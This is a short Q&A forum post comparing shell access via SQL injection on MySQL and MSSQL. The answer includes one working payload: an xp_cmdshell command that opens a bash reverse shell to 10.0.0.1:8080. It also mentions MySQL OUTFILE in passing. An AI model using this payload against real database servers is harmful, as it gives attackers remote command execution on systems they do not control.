# MySQL vs MSSQL injection to shell uploading

Tags: shellcode

What is the difference between uploading a shell via sqli in mysql vs mssql?

Answer (score 2):

MSSQL has a builtin command called xp_cmdshell that executes system commands for you (how helpful, eh?). So this is how you get a shell on a Linux system running MSSQL:

> EXEC xp_cmdshell ‘bash -i >& /dev/tcp/10.0.0.1/8080 0>&1’

With MySQL, you have to actually be clever about things and use OUTFILE, a stored procedure  or some such.

Comment: Thanks yeah i know about mssql xp_cmdshell, how do i exploit mysql is i dont have the priv to write into file

Comment: @thefirethefox This exercise is left to the reader :)